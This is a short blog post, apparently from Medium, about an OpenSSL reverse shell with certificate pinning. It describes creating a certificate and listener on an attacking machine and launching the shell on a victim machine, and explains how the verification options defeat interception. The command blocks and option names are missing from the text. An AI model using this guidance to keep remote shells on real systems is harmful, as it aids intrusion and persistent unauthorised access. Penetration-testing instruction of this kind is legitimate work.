268 Followers
·
Follow

Openssl Reverse Shell with Certificate Pinning

Since my last article about reverse shells I made some progress. I added support for certificate pinning. This provides another layer of security. This makes it impossible for any interceptor to take over the shell with a MITM attack.

Image for post
Image for post
Photo by Noah S on Unsplash

Example

Certificate

Create a certificate on the attacking machine:

Listener

Start the listener on the attacking machine:

Reverse Shell

Start the reverse shell on the victim machine through any form of code execution. Be sure to upload the in a secure manner beforehand and make it accessible.

The option checks the certificate chain to a depth of 1. So it checks only the one certificate provided in . This works for all self-signed certificates. If you use a longer certificate chain for whatever reason, you have to adjust this value accordingly.

The option will terminate the connection, if the certificate chain cannot be verified. You can test this in your lab by generating a second key pair and certificate and connect with the “wrong” certificate. You will see that the connection comes in, but will be reset during the handshake due to the certificate error. You will be notified about that on the attacker machine, too. Experiencing this in the wild is a sign that somebody tried to intercept your shell.

If you encounter any problems or bugs, please feel free to contact me. I would like to make this reverse shell as secure and usable as possible.

Note: If you like to use Metasploit instead of a classic reverse shell you will love the Meterpreter Pranoid Mode.

Written by

www.honze.net — 1+1=10, Hacker, Nerd, former Soldier, working as InfoSec Pro — München

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store